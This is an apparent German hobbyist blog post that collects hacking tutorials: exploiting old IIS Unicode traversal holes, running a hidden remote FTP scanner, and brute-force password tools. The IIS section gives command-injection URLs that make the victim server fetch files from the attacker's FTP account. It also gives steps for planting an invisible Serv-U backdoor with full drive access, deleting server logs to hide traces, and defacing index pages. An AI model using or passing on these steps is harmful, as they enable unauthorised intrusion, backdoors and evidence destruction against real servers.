IIS (Server) Hacken
Habe mal was nettes gefunden und will es euch zeigen!!!Da viele klicks auf Hacking gehen gibt es hier was neues.
IIS (Server) Hacken by Ship (PyrOo)
Ich übernehme keine Verantwortung, fals ihr mit den Informationen etwas zerstört!
Bal bla bla.. ihr kennt den scheiss!
1) Einleitung
In diesem TUT werde ich erklären, wie man IIS Server hacken, defacen, und für die eigenen Zwecke brauchen kann.
Im ersten Teil wird beschrieben, wie dies über Programme geht, im zweiten Teil, wie man solche Server ohne Programme hackt.
2) Scannen
Die Schwachstelle eines IIS Servers liegt darin, dass man bei älteren Versionen über so genannte Unicodes schreiberechte hat. Das heisst, man kann auf alle Daten zugreifen und sie verändern.
Scannen ohne einen Scanner ist fast unmöglich, mann müsste bei jeder IP jeden Unicode ausprobieren, und das kann dauern. Also saugen wir uns erst mal einen Scanner! Ich beforzuge den FX-Scanner.
Dieser Scanner sucht nach IIS Server mit unicodes und nach FTP Server mit anonymous zugang.
Da die ofizielle Seite leider offline gegangen ist, habe ich die Install datei auf einen Tripod account geladen.
Wir saugen uns also schnell den FX-Scanner unter
So, nun installieren wir den scanner.. würde Deutsch empfehlen *g
Wir machen am besten einen Ordner auf den desktop und erstellen eine Verknüpfung des Scanners in den Ordner. So können wir immer schnell auf unsere Sachen zugreiffen.
Das Scannen ist keine sache. Ihr könnt die IP Range angeben mit z.B. 1.2.*.* (das heisst, dass der Scanner jz statt den *en alle zahlen durchgeht!)
Wenn ihr wollt, könnt ihr noch einen Proxy einstellen. Oder FxP Tests machen, aber eigentlich alles überflüssig.
Wenn der Scanner etwas findet, speichert er die daten in eine datei im Verzeichnis des Servers.
Da steht dan die IP, der Unicode, die Laufwerke (können wir später noch brauchen) und ob der Server eine Firewall hat. (haben sie meistens! Teure Firewalls aber iis bugs.. *g Peinlich!)
3) Hacken (mit Tools)
Das mit den Tools ist immer so eine Sache. Es giebt viel zu viele, die nicht wissen, was passiert, wenn sie auf einen Button ihrer Hackertools drücken. Meiner Meinung nach, ist es OK, wenn man mit Tools arbeitet. Aber nur, wenn man auch versteht, was da eigentlich Passiert! Sie sind schneller und bequemer!
Ich kenne nur 2 Tools, die für iishacking geeignet sind! Diese sind Azrael666 und IISDjinn ;]
Ihr bekommt sie auch unter (Namen: Azrael666 und IISDjinn…)
Ich muss noch sagen, dass IISDjinn noch nicht fertig gecodet ist. Ist aber ein echt gutes Programm! (thx an DjinnHunter187)
Mein Tipp: Erst IISDjinn und erst, wenn da irgend was nicht funtzt kommt Azrael666 zum Einsatz
Wir starten nun IISDjinn, dann geht’s so weiter:
- wir geben die Ip an und drückenmal Unicode 1, entweder kommt, dass du keine Rechte hast (oder Seite kann nicht angezeigt werden, usw.), oder du siehst die Festplatte c:
- Wir klicken auf „Log In“, wo wir die Festplatte sehen können
- Nun sehen wir die verschiedenen Befehle.. ich werde sie euch mal kurz erklären:
-
DIR Ihr könnt ein Verzeichnis angeben und auf DIR klicken, dann werdet ihr alle
Daten/Ordner in diesem Verzeichnis sehen (in den Scannresultaten steht ja, welche Verzeichnisse vorhanden sind)
MKDIR Mit diesem Befehl könnt ihr einen neuen Ornder erstellen…
COPY Mit den COPY Befehl könnt ihr sachen auf dem Server herumkopieren..
Diesen Befehl müsst ihr immmer gleich drücken, wenn ihr etwas auf den Server
machen wollt! (So kopiert ihr die cmd.exe ins internet verzeichnis)
REN Wenn ihr z.B. die index datei überschreiben wollt, wäre es nett, zuerst die alte index
absichert! Mit diesem Befehl, kann man also Dateien Kopieren und ihnen einen neuen Namen geben!
READ Mit READ könnt ihr sachen lesen und downlaoden, geht aber nicht mit allen Formaten! EXE zb nicht! (aber da kennen wir doch ne lösung! Kommt dan weiter unten! )
DEL Ist da, um Daten zu löschen
DELTREE Damit kann man einen ordner löschen!
VOL Giebt euch Infos zur Festplatte
ECHO mit Diesem Befehl könnt ihr die Index datei umschreiben! ;]
Einfach mal ein bisschen rumspielen!
4) Wichtig
Wer nicht viel in DOS arbeitet, wird nicht verstehen, wiso dies nicht funktioniert:
C:\gemeinsame Dateien\
Der Server merkt nicht, welchen Ordner du öffnen möchtest!
Da du in einem anderen System schreiben musst!
Wenn der Ordner „Hallo“ heisst, geht es ganz normal, da er keine Lehrzeichen beinhaltet.
Daher:
C:\Hallo\
Wenn der Ordner „Hallo du Arsch“ heisst, geht es anders, da zwischen den Wörtern Lehrzeichen stehen.
Das System ist ganz einfach:
Zuerst nimmt man die ersten 6 Buchstaben, der Ornder (hier also: Hallod) nun kommt noch ein ~1 dazu!
(es kann sein, dass es auch ~2 oder ~3 ist, einfach ausprobieren!)
Also:
C:\Hallod~1\
5) Downloaden (mit IISDjinn)
Wenn wir glück haben, können wir über den READ befehl die Datei saugen oder ansehen.
Fals es nicht geht ist dies nicht weiter schlimm.
Ich müsste fileicht noch etwas erklären…
Wenn wir die ip 1.2.3.4 haben, ist das ja ein Server, aber wenn wir in den Browser eingeben, sehen wir ja nicht die Festplatte, sondern eine Seite!
Alle Seiten sind im Ordner Laufwerk/inetpub/wwwroot/ gespeichert!
Das heisst, wenn wir die Datei, die wir saugen wollen in diesen Ordner kopieren, haben wir es schon geschaft!
Beispiel:
Wir möchten die datei „Geschäfte.doc downloaden!
Wir geben also beim COPY Befehl
Oben: c:\ordner\geschäfte.doc und
Unten: c:\inetpub\wwwroot\
an! (für c einfach den Laufwerknamen!)
nun gehen wir wieder in den Browser und geben folgedes ein:
und schon haben wir es geschaft!
Einfach oder? ;]
6) Uppen
Uppen würde ich ohne Programme, ist leichter so!
Aber ganz einfach wird es nicht!
Ich werde euch hier schnell den sichersen Weg beschreiben.
1) wir richten uns einen Tripod Account ein.
2) Wir uppen die Daten, die wir später auf den gehackten Server laden wollen auf diesen Account
3) Nun müssen wir die Daten nur noch vom Tripod Server auf unseren Server laden, dies geschieht so:
(zb. ich will nun eine index.htm und eine logo.jpg saugen)
(IP= IP des gehackten Server, c+mkdir+c:\temp\etc\etc\etc = erstellt dieses Verzeichnis)
(Befehl giebt uns schreiberechte!)
/scripts/superlol.exe?/c+echo+open+ftp.mitglied.lycos.de+21>>c:\temp\etc\ etc\etc\ftpscr.txt
(IP= IP des gehackten Server, ftp.mitgleid.lycos.de= Tripod ftp Server, 21=ftp Port)
http://IP/scripts/superlol.exe?/c+echo+USERNAME>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehackten Server, USERNAME= euer Tripod Username)
http://IP/scripts/superlol.exe?/c+echo+PASSWORT>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehackten Server, PASSWORT = euer Tripod FTP Passwort)
http://IP/scripts/superlol.exe?/c+echo+BINARY>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehackten Server, BINARY= Format)
http://IP/scripts/superlol.exe?/c+echo+get+index.htm>>c:\temp\etc\etc\etc\ftpscr.t xt
(IP= IP des gehackten Server, index.htm=die Datei, die ich saugen will)
http://IP/scripts/superlol.exe?/c+echo+get+logo.jpg>>c:\temp\etc\etc\etc\ftpscr.tx t
(IP= IP des gehackten Server, logo.jpg = die 2. Datei, die ichs augen will)
http://IP/scripts/superlol.exe?/c+echo+quit>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehackten Server, quit = ende)
(Dieser Befehl startet das Script!)
nun wird euch der Server die Daten runterladen! Ihr könnt sie dan noch herumkopieren! ;]
7) Pubstro
Jetzt wird’s ein wenig komplizierter, aber das hällt uns nicht auf, oder?
Los geht’s…
Zuerst einmal: Hier gehen fast nur Server ohne Firewall! Also sucht die ohne aus den scannresultaten raus!
Wir brauchen:
• Einen Browser (Internet Explorer, usw.)
• Proxy (zb jap) ist aber nicht unbedingt nötig!
• Ein FTP programm (zb FlashFxP [auch auf
• Wieder unseren Tripod Account
• Serv-u (auch auf )
1) erst insallieren wir Serv-U und konfigurieren den Port und die Login Daten
2) Wir öffnen Serv-U.ini und schreiben „INVISIBLE=TRUE“ dazu (dass uns der Admin nicht so schnell entdeckt.. )
3) Alles sollte dann in etwa so aussehen:
HomeDir=c:\
AlwaysAllowLogin=YES
Access1=h:\,RWAMCDLEP
Access2=g:\,RWAMCDLEP
Access3=f:\,RWAMCDLEP
Access4=e:\,RWAMCDLEP
Access5=d:\,RWAMCDLEP
Access6=c:\,RWAMCDLEP
Access7=j:\,RWAMCDLEP
Ihr solltet noch einen Zweiten User Account einrichten.
Also einen Root (mit schreiberechten) und einen Remote-user (ohne schreibrechte)
Würde dan ungefär so aussehen:
Access1=c:\,RLP
Access2=d:\,RLP (usw.)
4) Nun laden wir die Serv-U.exe und die konfigurierte serv-U.ini in das Hauptverzeichnis unseres Tripodaccounts
5) Nun erstellen wir auf den Server ein Verzeichnis, wo wir unser kleines serv-U platzieren wollen.. dieses Verzeichnis sollte möglichst unauffällig sein, damit der Admin nix merkt! (also bz. C:\temp\etc\etc\etc) der code sieht dan so aus:
(IP = Server IP)
Wenn das Verzeichnis erstellt wurde, sollte eine CGI-Fehlermeldung kommen!
6) Wir können nun noch nachschauen, ob das Verzeichnis auch wirklich existiert.
(ihr müsst den Pfad natürlich an eurem Verzeichnis anpassen *g)
wenn nun „ .. “ und irgendwas steht, wurde das Verzeichnis erstellt und wir waren erfolgreich.
7) nun müssen wir die cmd noch kopieren, damit wir den echo befehl nützen können!
Das sieht dann so aus:
Wir sind nun fast am Ziel. Nun erstellen wir eine .txt Datei, welche wir als FTP Script nutzen, damit sich der Server per FTP auf unserem Tripod Account einwählt und sich das Serv-U.exe/.ini downloadet (wie bei Download schon )
/scripts/superlol.exe?/c+echo+open+ftp.mitglied.lycos.de+21>>c:\temp\etc\ etc\etc\ftpscr.txt
(IP= IP des gehacken Server, ftp.mitgleid.lycos.de= Tripod ftp Server, 21=ftp Port)
http://IP/scripts/superlol.exe?/c+echo+USERNAME>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, USERNAME= euer Tripod Username)
http://IP/scripts/superlol.exe?/c+echo+PASSWORT>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, PASSWORT = euer Tripod FTP Passwort)
http://IP/scripts/superlol.exe?/c+echo+BINARY>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, BINARY= Format)
http://IP/scripts/superlol.exe?/c+echo+get+serv-u.exe>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, serv-u.exe=die Datei, die ich saugen will)
http://IP/scripts/superlol.exe?/c+echo+get+serv-u.ini>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, serv-u.ini = die 2. Datei, die ich saugen will)
http://IP/scripts/superlol.exe?/c+echo+quit>>c:\temp\etc\etc\etc\ftpscr.txt
(IP= IP des gehacken Server, quit = ende)
9) Noch ein kleiner Test, wir geben nun mal
ein.
Wenn etwas wie:
open ##IP-VOM-FTP-SERVER##
##USERNAME##
##PASSWORD##
BINARY
get serv-u.exe
get serv-u.ini
quit
erscheint, ist alles OK! :]
10) Nun führen wir unser Script aus, und zwar mit dieser Zeile:
Der Server connectet nun zu Tripod und saugt sich serv-U ;P
11) Unsere Daten liegen jz im InetPub Verzeichnis des Servers, da wir sie aber in unser Verzeichniss verschiben wollen, geben wir folgendes ein:
http://IP/scripts/superlol.exe?/c+move+serv-u*.*+“c:\temp\etc\etc\etc
12) Damit auch wirklich niemand merkt, dass wir hier waren, löschen wir die Script datei, mit:
13) Nun führen wir die Serv-U auf den Server aus, auch hierzu gibt es wieder einmal einen schönen Befehl:
14) So, nun warten wir ein paar Sekunden und loggen uns dan per FTP Programm (zb. FlashFxP) in den Server ein (nathürlich mit unseren vorher konfigurierten Daten ;] )
15) Nun sind wir im Root Verzeichnis des Severs und haben volle Schreibrechte … als nächstes suchen wir uns ein Unterverzeichniss oder erstellen eins, welches wir als das Verzeichniss benutzen, in das wir später uppen wollen!
16) Wir müssen nun das neue Verzeichnis auch in der serv-u.ini vermerken, also verändern und über die alte schreiben!!
Der Account mit den Schreibrechten müsste dan etwa so aussehen:
HomeDir=d:\Melinda\WORK\sample\LESSON\new\FUCK
AlwaysAllowLogin=YES
Access1=h:\,RWAMCDLEP
Access2=g:\,RWAMCDLEP
Access3=f:\,RWAMCDLEP
Access4=e:\,RWAMCDLEP
Access5=d:\,RWAMCDLEP
Access6=c:\,RWAMCDLEP
Access7=j:\,RWAMCDLEP
RelPaths=YES
und der Account zum Leechen so:
HomeDir=d:\Melinda\WORK\sample\LESSON\new\FUCK
RelPaths=YES
Access1=d:\Melinda\WORK\sample\LESSON\new\FUCK,RLP
17) Wir reconnecten, und tata.. wir sind in unserem Verzeichnis! (und sehen es als root-Verzeichnis) nen können wir uppen was das zeug hällt! *g oder die scheiss DSL Leitung
1 Nun nur noch die Logfiles killen.. und wir waren nie da! :]
Logfiles killen
Jedes mal, wenn ihr zu dem Server connectet, wird eure IP gespeichert! Blöde was? Vorallem wenn ihr ohne proxy hackt (wie ich leider manchmal *g)
Aber Windoof hat wie immer ne lösung
Die Logfiles befinden sich im ordner: c:\winnt\system32\logfiles\ (statt c einfach die Platte)
Wie ihr löschen könnt wisst ihr ja schon! ;]
9) Defacen
Decacen heisst soviel, wie die index.htm Datei des Servers umzuschreiben!
Dies geht über den echo Befehl (unten beschrieben) oder über das Download Pronzip!
Versucht euch selbst darin! Wenn die datei index.htm/.html oder default.htm/.html heisst, geht der Server automatisch darauf, wenn ihr die IP in den Browser eintippt!
10) Code sammlung
Wie versprochen hier noch die codes, um ohne Programme zu hacken!
Wer ein bisschen coden kann, kann sich ja seine Programme selber schreiben!
DIR =
(statt c:\ einfach das Verzeichnis)
MKDIR =
(statt testordner den neuen Ordner & Pfad)
COPY =
(c:\winnt\system… = diese Datei will ich kopieren, c:\inetpub… = in den inetpub\ Ordner mit dem Namen root.exe!)
REN =
(c:\inetpub\wwwroot\index.htm in backup.htm umbenennen)
READ =
(lese die Datei c.\winnt… hier die Logfiles ;] )
DEL =
(lösche alle Daten mit .htm Endung)
VOL =
(gibt Infos zu der Platte c:
ECHO = http://IP/scripts/root.exe?/c+echo+fuck%20tha%20world!%20by,%20Ship%20
>>c:\i netpub\wwwroot\index.htm
(schreibt den text: „fuck tha world! By Ship “ in die index.htm datei!
11) Ende
So, dass wars dan wieder mal von meiner Seite her! ;]
Ich werde bald wieder mal ein Tut schreiben, hoffe, es wird wieder genau so gross, wie dieses hier!
Ihr könnt den Text kopieren, aber bitte nicht verändern! (auch die Schreibfehler gehöhren zu mir *lol)
*** Dieses Tutorial dienst lediglich dazu, die Denkweise von Hackern zu verstehen!
Missbrauch ist strafbar! Ich hafte nicht für Schäden!
Upper:Sylber
Remote Scannen mit Fx Scanner- lokal steuerbar
Mit dem Guide lernt irhr mit dem scanner (fx scanner) nach port 21 (pubs) suchen zu können.
der vorteil dieses scanner ist, ihr könnt könnt ihn komplett ohne mit einem ftp programm auf den remote zu connecten steuern und er bekommt wesentlich mehr results aus einer range als beispielsweise dfind, scan500, scan1000 usw…
was auch noch sehr toll ist, ihr könnt jede einzelne ip angeben die ihr zum beispiel nicht scannen wollt…sehr gut um blacklisted server zu umgehen.
ihr braucht dafür:
- remote (str0, dump, remote desktop…) ohne av
- fx scanner -> http://xup.raidrush.ws/ndl_52de520caac25dc525508b09bbc4c/
- filter.exe -> http://xup.raidrush.ws/ndl_903ee2caa928100cdfc479d4aaaf5/
- den willen es zu tun
so, nun ladet ihr erst einmal den fx scanner von xup den ich euch oben bereitgestellt hab.
entpackt die fx.rar datei und raus kommt ein ordner mit inhalt namens „Fx Scanner“.
Den kompletten ordner uppt ihr auf den remote und führt dann im geöffneten Ordner
site exec av.exe -h aus, das hat den zweck, dass der scanner auf dem remote hidden ist.
dann startet ihr bei euch die „RScanner.exe“:
http://img181.imageshack.us/img181/3366/neuwindowsbitmapbildkc8.png
hier ändert ihr nichts, ausser das ihr bei „Server“ die Ip eures remots einfügt (ohne port usw).
jetzt könnt ihr auf connect gehen!
wenn sich jetzt nichts tut, hat euer remote ne av und könnt es somit vergessen, wenn es aber geht , habt ihr ab jetzt ein wunderschönes leben als scanner 
nach dem ihr connect gedrückt habt, dürfte dann dieses fenster kommen:
http://img178.imageshack.us/img178/300/neuwindowsbitmapbildon9.png
die ip tragt ihr nach ganz einfachem prinzip ein, ihr könnt eine ganze range, oder auch nur einen kleinen teil einer range, so wie nur einzelne ips scannen.
lasst euch dabei nicht von der fehlermeldung in die irre führe, das ist ein bug der aber nicht weiter stört, dieser entsteht immer wenn ihr mit der maus auf das ip-eingabe feld kommt
nach diesem muster könnt ihr die ips eigeben:
http://img178.imageshack.us/img178/7420/neuwindowsbitmapbild2at7.png
die ip die ihr wollt müsst ihr nun adden und dann kann das ganze auch schon los gehen indem ihr auf „go“ klickt.
jetzt könnt ihr theoretisch euren pc runterfahren, der rest macht sich von allein!
wenn ihr dann irgendwann mal eure results haben wollt, geht ihr entweder auf den remote und ladet euch die datei „ftp.txt“ oder ihr connectet wieder mit „RScanner.exe“ und seht euch die ergebnisse bei „view scan results“ an(zeigt aber nur ca. 2000 ips)
zum ip filtern nehmt ihr „filter.exe“ und ihr erhaltet die gefilterten ips ohne zusatzangaben.
vorher sieht der result beispielsweise so aus:
65.5.171.119
Exploit : FTP
Hostname : adsl-065-005-171-119.sip.dab.bellsouth.net
Os : 215 UNIX Type: L8
Resume : Yes
List : No
Upload : Yes
Firewall : Yes
und nacher ist das nur noch die einfach ip die ihr braucht um die results noch einmal mit grimsping zu checken.
*** Dieses Tutorial dienst lediglich dazu, die Denkweise von Hackern zu verstehen!
Missbrauch ist strafbar! Ich hafte nicht für Schäden!
Upper:Sylber
Brute Force
Brute-Force
Marc Pruef
Brute-Force gilt als die einfachste und primitivste Methode ein Passwort
herauszufinden und ist nur das stupide Durchprobieren aller möglichen
Zeichenkombinationen. Von enormen Vorteil ist ganz sicher der Besitz einer
Liste aller gültigen IDs des Systems, da sonst die Anzahl der Möglichen
Benutzerkennung-Passwort-Kombinationen exponentiell die nötigen Versuche
für einen positiven Zugriff erweitert würden.
So oder so gilt diese Attacke als sehr zeitaufwändig, und wird meist nur von
ungeübten oder verzweifelten Angreifern eingesetzt.
Es gibt auch die Möglichkeit, die Versuche dieser Attacke ein bisschen einzuschränken,
und nur in Wörterbüchern existierende Wörter auszuprobieren.
Dies kann jedoch den Erfolg ohne weiteres verhindern, wenn zum Beispiel das Passwort
mit sinnlos erscheinenden Zahlen oder Sonderzeichen bestückt ist.
Es empfiehlt sich daher immer ein in Wörterbüchern non-existentes Wort
als eigenes Passwort zuverwenden, um diese sogenannten Dictionary-Attacks zu vereiteln.
Es ist übrigens meist sinnlos, eine Bruteforce-Attacke auf die Root-ID zu starten.
Zwar existieren standartgemäss in allen Unix-Systemen ein solcher Super-User,
jedoch ist dieser Account aus sicherheitsgründen standartgemäss für Remote-Logins
(Telnet und FTP) gesperrt.
Eines der besten Programme für einen automatisierten Angriff einen per Netzwerk
erreichbaren, durch Passwort geschützt Dienst zu kompromittieren ist das
Windows-Programm „UnSecure“. Dessen fündig wird man ohne grössere Probleme im
World Wide Web. Mit diesem Tool lassen sich individuell alle Ports attackieren,
wodurch ein Angriff auf FTP (Port 21), SSH (Port 22), Telnet (23), HTTP (Port 80)
und POP3 (Port 110) realisiert werden kann. Um UnSecure zu benützen benötigt man
jedoch die IP-Adresse des Ziel-Hosts, was vielen Script-Kiddies in ihren Kinderschuhen
Probleme bereiten sollte. Ab Version 1.2 unterstützt UnSecure einige sehr vorteilhafte
Funktionen: Zum einen ist es möglich, nach dem gewalttätigen Disconnect des Hosts
wieder automatisch einen Reconnect durchzuführen. Dadurch ist auch ein Attackieren
eines Servers möglich, der eine Schutzfunktion aktiviert hat, welche nach mehrmaliger
Eingabe eines falschen Passworts die Verbindung trennt. Probleme gibt es, wenn statt
einem Disconnect nur eine erweiterte Wartezeit eingeschoben wurde:
Das Programm unterwirft sich eigener Fehlfunktionen.
Ausserdem erlaubt das Tool nun auch noch automatisches Speichern nach
jeweils 100 Versüchen. So kann bei einem Absturz direkt dort weitergemacht werden,
wo man unterbrochen wurde. Das eignet sich hervorragend um die billigeren Nacht-
und Wochenend-Tarife als Dial-Up-Anwender auszunutzen.
Das reine HTTP-Pendant zu Unsecure heisst WWWHack, und steht an einigen Ecken
im Internet zum Download bereit. Die offizielle Homepage von WWWHack war/ist
unter http://members.xoom.com/jimrand/download.html erreichbar. Die Seite war
bis vor kurzem down, und wurde nun direkt von Xoom gelöscht. Der Programmierer
von WWWHack muss sich wohl oder übel eine neue Location für den Vertrieb seines
Tools suchen. Dieses Programm kann hervorragend für das ausbooten sogenannter
HTACCES-Passwortabfragen benutzt werden, die standartmässig auf vielen
UNIX-Servern – dieses System wurde ursprünglich beim Apache-Server eingeführt -
benutzt werden und ganz normal auf TCP-Port 80 kontaktiert werden müssen.
Auch können Angriffe auf (kombinierte) eingebettete Java- bzw. CGI-Abfragen
in HTML-Dokumenten durchgeführt werden, wobei die Konfiguration sich als
ziemlich schwierig herausstellt, wenn man kein versierter HTML- und HTTP-Kenner ist.
Es werden auch diverse Remote-Tools für Brute-Force-Angriffe auf Calling-Cards,
Router oder VPNs benutzt. Daher kann man sagen, dass überall, wo ein System
mittels Passwort geschützt ist, diese Angriffsfläche mit dem eingesetzten System
automatisch existent wird. Doch dies gilt nicht nur für externe Angriffe.
Es gibt diverse Programme, die Passwort-Dateien verschiedenster Betriebssysteme
und Programme knacken können. Auch existiert ein sehr effizientes Tool zum
decodieren von mit PGP verschlüsselten Texten
*** Dieses Tutorial dienst lediglich dazu, die Denkweise von Hackern zu verstehen!
Missbrauch ist strafbar! Ich hafte nicht für Schäden!
Alle Angaben sind OHNE Gewähr und ich garantiere nicht für deren Richtigkeit und Funktion! Diese Techniken
dürfen allerdings nicht angewendet werden und wir übernehmen keine Haftung für Schäden! Nicht nachmachen! ***
Upper:Sylber
About Grexsoft
Grexsoft ist eine HobbyFirma die momentan verschiedene sachen erstellt.
Http://www.grexguides.de.ms <—New URL
Vote4Us.
Weiteres kommt noch
-
Letzte
-
Links
-
Archive
- Januar 2008 (1)
- November 2007 (5)
- Oktober 2007 (5)
- September 2007 (15)
- August 2007 (19)
-
Kategorien
-
RSS
RSS der Einträge
Kommentarfeed
